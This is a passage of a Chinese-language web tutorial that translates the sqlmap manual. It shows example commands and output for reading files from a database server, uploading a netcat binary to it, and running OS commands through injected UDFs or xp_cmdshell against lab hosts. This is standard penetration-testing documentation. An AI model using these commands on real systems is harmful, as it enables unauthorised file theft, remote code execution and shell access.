New';\">[hh:mm:43]&nbsp;[INFO]&nbsp;retrieved:&nbsp;users<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;testdb<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1&nbsp;table]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;-+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;users&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;-+<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%88%97%E5%90%8D\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u66b4\u529b\u7834\u89e3\u5217\u540d<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;common-columns<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e0e\u66b4\u529b\u7834\u89e3\u8868\u540d\u4e00\u6837\uff0c\u66b4\u529b\u8dd1\u7684\u5217\u540d\u5728<span>txt\/common-columns.txt<\/span><span>\u4e2d\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E6%B3%A8%E5%85%A5\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\u6ce8\u5165<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;udf-inject,&#8211;shared-lib<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f60\u53ef\u4ee5\u901a\u8fc7\u7f16\u8bd1<span>MySQL<\/span><span>\u6ce8\u5165\u4f60\u81ea\u5b9a\u4e49\u7684\u51fd\u6570\uff08<\/span><span>UDFs<\/span><span>\uff09\u6216<\/span><span>PostgreSQL<\/span><span>\u5728<\/span><span>windows<\/span><span>\u4e2d\u5171\u4eab\u5e93\uff0c<\/span><span>DLL<\/span><span>\uff0c\u6216\u8005<\/span><span>Linux\/Unix<\/span><span>\u4e2d\u5171&nbsp;\u4eab\u5bf9\u8c61\uff0c<\/span><span>sqlmap<\/span><span>\u5c06\u4f1a\u95ee\u4f60\u4e00\u4e9b\u95ee\u9898\uff0c\u4e0a\u4f20\u5230\u670d\u52a1\u5668\u6570\u636e\u5e93\u81ea\u5b9a\u4e49\u51fd\u6570\uff0c\u7136\u540e\u6839\u636e\u4f60\u7684\u9009\u62e9\u6267\u884c\u4ed6\u4eec\uff0c\u5f53\u4f60\u6ce8\u5165\u5b8c\u6210\u540e\uff0c<\/span><span>sqlmap<\/span><span>\u5c06\u4f1a\u79fb\u9664\u5b83\u4eec\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E7%B3%BB%E7%BB%9F%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u7cfb\u7edf\u6587\u4ef6\u64cd\u4f5c<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BB%8E%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%AD%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4ece\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d\u8bfb\u53d6\u6587\u4ef6<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;file-read<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u6570\u636e\u5e93\u4e3a<span>MySQL<\/span><span>\uff0c<\/span><span>PostgreSQL<\/span><span>\u6216<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\u3002\u8bfb\u53d6\u7684\u6587\u4ef6\u53ef\u4ee5\u662f\u6587\u672c\u4e5f\u53ef\u4ee5\u662f\u4e8c\u8fdb\u5236\u6587\u4ef6\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>Microsoft&nbsp;SQL&nbsp;Server&nbsp;2005<\/span><span>\u7684\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.129\/sqlmap\/mssql\/iis\/get_str2.asp?name=luther&#8221;&nbsp;\\<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8211;file-read&nbsp;&#8220;C:\/example.exe&#8221;&nbsp;-v&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:49]&nbsp;[INFO]&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;is&nbsp;Microsoft&nbsp;SQL&nbsp;Server<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;server&nbsp;operating&nbsp;system:&nbsp;Windows&nbsp;2000<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;application&nbsp;technology:&nbsp;ASP.NET,&nbsp;Microsoft&nbsp;IIS&nbsp;6.0,&nbsp;ASP<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;Microsoft&nbsp;SQL&nbsp;Server&nbsp;2005<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[INFO]&nbsp;fetching&nbsp;file:&nbsp;&#8216;C:\/example.exe&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[INFO]&nbsp;the&nbsp;SQL&nbsp;query&nbsp;provided&nbsp;returns&nbsp;3&nbsp;entries<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">C:\/example.exe&nbsp;file&nbsp;saved&nbsp;to:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;\/software\/sqlmap\/output\/192.168.136.129\/files\/C__example.exe&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;ls&nbsp;-l&nbsp;output\/192.168.136.129\/files\/C__example.exe&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">-rw-r&#8211;r&#8211;&nbsp;1&nbsp;inquis&nbsp;inquis&nbsp;2560&nbsp;2011-MM-DD&nbsp;hh:mm&nbsp;output\/192.168.136.129\/files\/C__example.exe<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;file&nbsp;output\/192.168.136.129\/files\/C__example.exe&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">output\/192.168.136.129\/files\/C__example.exe:&nbsp;PE32&nbsp;executable&nbsp;for&nbsp;MS&nbsp;Windows&nbsp;(GUI)&nbsp;Intel<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">80386&nbsp;32-bit<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%8A%8A%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%B0%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%AD\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u628a\u6587\u4ef6\u4e0a\u4f20\u5230\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;file-write,&#8211;file-dest<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u6570\u636e\u5e93\u4e3a<span>MySQL<\/span><span>\uff0c<\/span><span>PostgreSQL<\/span><span>\u6216<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\u3002\u4e0a\u4f20\u7684\u6587\u4ef6\u53ef\u4ee5\u662f\u6587\u672c\u4e5f\u53ef\u4ee5\u662f\u4e8c\u8fdb\u5236\u6587\u4ef6\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>MySQL<\/span><span>\u7684\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;file&nbsp;\/software\/nc.exe.packed&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">\/software\/nc.exe.packed:&nbsp;PE32&nbsp;executable&nbsp;for&nbsp;MS&nbsp;Windows&nbsp;(console)&nbsp;Intel&nbsp;80386&nbsp;32-bit<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;ls&nbsp;-l&nbsp;\/software\/nc.exe.packed<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">-rwxr-xr-x&nbsp;1&nbsp;inquis&nbsp;inquis&nbsp;31744&nbsp;2009-MM-DD&nbsp;hh:mm&nbsp;\/software\/nc.exe.packed<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.129\/sqlmap\/mysql\/get_int.aspx?id=1&#8221;&nbsp;&#8211;file-write&nbsp;\\<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8220;\/software\/nc.exe.packed&#8221;&nbsp;&#8211;file-dest&nbsp;&#8220;C:\/WINDOWS\/Temp\/nc.exe&#8221;&nbsp;-v&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:29]&nbsp;[INFO]&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;is&nbsp;MySQL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;server&nbsp;operating&nbsp;system:&nbsp;Windows&nbsp;2003&nbsp;or&nbsp;2008<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;application&nbsp;technology:&nbsp;ASP.NET,&nbsp;Microsoft&nbsp;IIS&nbsp;6.0,&nbsp;ASP.NET&nbsp;2.0.50727<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;MySQL&nbsp;&gt;=&nbsp;5.0.0<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;confirmation&nbsp;that&nbsp;the&nbsp;file&nbsp;&#8216;C:\/WINDOWS\/Temp\/nc.exe&#8217;&nbsp;has&nbsp;been&nbsp;successfully&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">written&nbsp;on&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;file&nbsp;system?&nbsp;[Y\/n]&nbsp;y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:52]&nbsp;[INFO]&nbsp;retrieved:&nbsp;31744<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:52]&nbsp;[INFO]&nbsp;the&nbsp;file&nbsp;has&nbsp;been&nbsp;successfully&nbsp;written&nbsp;and&nbsp;its&nbsp;size&nbsp;is&nbsp;31744&nbsp;bytes,&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">same&nbsp;size&nbsp;as&nbsp;the&nbsp;local&nbsp;file&nbsp;&#8216;\/software\/nc.exe.packed&#8217;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%BF%90%E8%A1%8C%E4%BB%BB%E6%84%8F%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8fd0\u884c\u4efb\u610f\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;os-cmd,&#8211;os-shell<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u6570\u636e\u5e93\u4e3a<span>MySQL<\/span><span>\uff0c<\/span><span>PostgreSQL<\/span><span>\u6216<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5728<span>MySQL<\/span><span>\u3001<\/span><span>PostgreSQL<\/span><span>\uff0c<\/span><span>sqlmap<\/span><span>\u4e0a\u4f20\u4e00\u4e2a\u4e8c\u8fdb\u5236\u5e93\uff0c\u5305\u542b\u7528\u6237\u81ea\u5b9a\u4e49\u7684\u51fd\u6570\uff0c<\/span><span>sys_exec()<\/span><span>\u548c<\/span><span>sys_eval()<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u90a3\u4e48\u4ed6\u521b\u5efa\u7684\u8fd9\u4e24\u4e2a\u51fd\u6570\u53ef\u4ee5\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u3002\u5728<span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\uff0c<\/span><span>sqlmap<\/span><span>\u5c06\u4f1a\u4f7f\u7528<\/span><span>xp_cmdshell<\/span><span>\u5b58\u50a8\u8fc7\u7a0b\uff0c\u5982\u679c\u88ab\u7981\uff08\u5728<\/span><span>Microsoft&nbsp;SQL&nbsp;Server&nbsp;2005<\/span><span>\u53ca\u4ee5\u4e0a\u7248\u672c\u9ed8\u8ba4\u7981\u5236\uff09\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u91cd\u65b0\u542f\u7528\u5b83\uff0c\u5982\u679c\u4e0d\u5b58\u5728\uff0c\u4f1a\u81ea\u52a8\u521b\u5efa\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>PostgreSQL<\/span><span>\u7684\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/pgsql\/get_int.php?id=1&#8221;&nbsp;\\<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8211;os-cmd&nbsp;id&nbsp;-v&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;application&nbsp;technology:&nbsp;PHP&nbsp;5.2.6,&nbsp;Apache&nbsp;2.2.9<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;PostgreSQL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;fingerprinting&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;operating&nbsp;system<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;operating&nbsp;system&nbsp;is&nbsp;Linux<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;testing&nbsp;if&nbsp;current&nbsp;user&nbsp;is&nbsp;DBA<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;detecting&nbsp;back-end&nbsp;DBMS&nbsp;version&nbsp;from&nbsp;its&nbsp;banner<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;checking&nbsp;if&nbsp;UDF&nbsp;&#8216;sys_eval&#8217;&nbsp;already&nbsp;exist<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;checking&nbsp;if&nbsp;UDF&nbsp;&#8216;sys_exec&#8217;&nbsp;already&nbsp;exist<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;creating&nbsp;UDF&nbsp;&#8216;sys_eval&#8217;&nbsp;from&nbsp;the&nbsp;binary&nbsp;UDF&nbsp;file<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;creating&nbsp;UDF&nbsp;&#8216;sys_exec&#8217;&nbsp;from&nbsp;the&nbsp;binary&nbsp;UDF&nbsp;file<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;to&nbsp;retrieve&nbsp;the&nbsp;command&nbsp;standard&nbsp;output?&nbsp;[Y\/n\/a]&nbsp;y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">command&nbsp;standard&nbsp;output:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;uid=104(postgres)&nbsp;gid=106(postgres)&nbsp;groups=106(postgres)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:19]&nbsp;[INFO]&nbsp;cleaning&nbsp;up&nbsp;the&nbsp;database&nbsp;management&nbsp;system<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;to&nbsp;remove&nbsp;UDF&nbsp;&#8216;sys_eval&#8217;?&nbsp;[Y\/n]&nbsp;y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;to&nbsp;remove&nbsp;UDF&nbsp;&#8216;sys_exec&#8217;?&nbsp;[Y\/n]&nbsp;y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:23]&nbsp;[INFO]&nbsp;database&nbsp;management&nbsp;system&nbsp;cleanup&nbsp;finished<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:23]&nbsp;[WARNING]&nbsp;remember&nbsp;that&nbsp;UDF&nbsp;shared&nbsp;object&nbsp;files&nbsp;saved&nbsp;on&nbsp;the&nbsp;file&nbsp;system&nbsp;can&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">only&nbsp;be&nbsp;deleted&nbsp;manually<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u7528<span>&#8211;os-shell<\/span><span>\u53c2\u6570\u4e5f\u53ef\u4ee5\u6a21\u62df\u4e00\u4e2a\u771f\u5b9e\u7684<\/span><span>shell<\/span><span>\uff0c\u53ef\u4ee5\u8f93\u5165\u4f60\u60f3\u6267\u884c\u7684\u547d\u4ee4\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p 